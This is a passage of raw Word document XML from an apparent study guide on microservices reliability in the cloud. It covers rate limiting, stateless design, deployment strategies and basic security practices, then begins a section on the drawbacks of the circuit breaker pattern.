          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>message queues</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Amazon SQ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Azure Service Bus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>publish-subscribe systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Apache Kafka</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Google Cloud Pub/Sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>) to decouple microservices. This ensures that even if one service goes down, other services can continue to process messages without direct dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58BDA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vent Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Store events (instead of the current state) to enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>event repla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state rebuilding</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> in case of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71453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Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D78ADE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event Overloading</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rate limiting</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throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the API Gateway or service level to protect microservices from excessive load or potential denial-of-service attacks. Cloud platforms provide integrated rate-limiting mechanisms (e.g., AWS API Gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5A622"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Statelessness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B3270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sign for Statelessness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Design microservices to b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meaning they do not store session or state information locally. This allows microservices to be more easily scaled, restarted, or redeployed without impacting users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC94E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ate Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Use cloud-native storage solutions (e.g., Amazon S3, Azure Blob Storage) for persisting state externally, allowing microservices to remain stateless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A251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Blue-Green Deployments and Canary Releases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D806D"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lue-Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Deploy new versions of microservices in parallel (blue and green environments) and switch traffic once the new version is verified to be stable. This minimizes downtime and ensures availability during deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04C1B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anary Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Gradually roll out new versions of microservices to a small subset of users before a full release. This reduces the risk of impacting the entire user base and ensures smooth transitions between versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A888DC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3. Immutable Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4E92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mmutable Deployments</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immutable infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> by treating microservices as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers or virtual machine images that are replaced entirely when updates are made. This reduces the risk of inconsistency across deployments and ensures a more reliable environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E609A5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4. Security Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0DBF0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ccess Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fine-grained access control</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> using IAM (Identity and Access Management) to limit who can access your microservices. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OAuth</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JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, or other security mechanisms to ensure only authorized users can access the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6966CEC1"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ncryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>end-to-end encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TLS) for communication between microservices. Encrypt sensitive data both in transit and at rest to ensure security and prevent data leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816A013"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pict w14:anchorId="14F6BBD0">
          <v:rect id="_x0000_i7534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707CA3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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4E370"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To achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>relia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vailability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> of microservices in the cloud, you should:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6228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Leverage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with horizontal scaling and auto-scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897123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se </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to distribute traffic and avoid single points of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1E5E7"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> using patterns like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>circuit breakers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD8B4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tilize </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, health checks, and monitoring tools to ensure services are healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D63EF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dopt </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>disaster recover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failover</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms to handle outages gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AB82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Incorporate </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> architectures for decoupling and resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB7F7B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Ensur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xml:space="preserve"> designs to simplify scaling and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A68311"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By following these practices and using cloud-native features, you can ensure that your microservices are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>reli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silien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lways available</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to meet the needs of your users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFEF287" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="588FE544">
          <v:rect id="_x0000_i7529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAE63C" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00CE4B95" w:rsidRDefault="000B09B5" w:rsidP="00E20673">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="741" w:name="_Toc197867955"/>
      <w:r w:rsidRPr="00E20673">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the disadvantages of Circuit breaker design pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="741"/>
    </w:p>
    <w:p w14:paraId="414F4052" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00E20673">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The Circuit Breaker design pattern is widely used to handle faults in microservices architectures by preventing failures from propagating across services. While it is effective in ensuring system resilience, it does come with certain disadvantages and limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863704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False Positives (Premature Tripping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7B34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The circuit breaker might open (i.e., stop calls to a service) prematurely, even when the service could recover quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23068AC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leads to unnecessary interruptions in service, causing </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>temporary unavailability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for users or systems that could otherwise be operational. The system could enter a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fail-fast state</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> without giving the service enough time to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07E80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lastRenderedPageBreak/>
        <w:t>2. Complexity in Configuration and Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C998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xml:space="preserve">: Configuring the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>thresholds</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for failure detection (e.g., how many failures are tolerated before the breaker trips) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>timeout period</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for recovery can be tricky.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5279983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Incorrect tuning of these parameters can either cause the circuit breaker to be too sensitive (leading to unnecessary open states) or not sensitive enough (leading to long periods of service disruption without recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD26D1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Increased Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF309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Circuit breakers introduce extra logic to detect failures and manage the state of the circuit (open, closed, half-open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8F88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introduce </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to requests, especially when there is a need to constantly check the health of dependent services or decide whether the breaker should be opened or closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F928EA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Limited Visibility into the Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5476BCE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xml:space="preserve">: While a circuit breaker prevents further calls to a failing service, it does not necessarily provide detailed insights into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
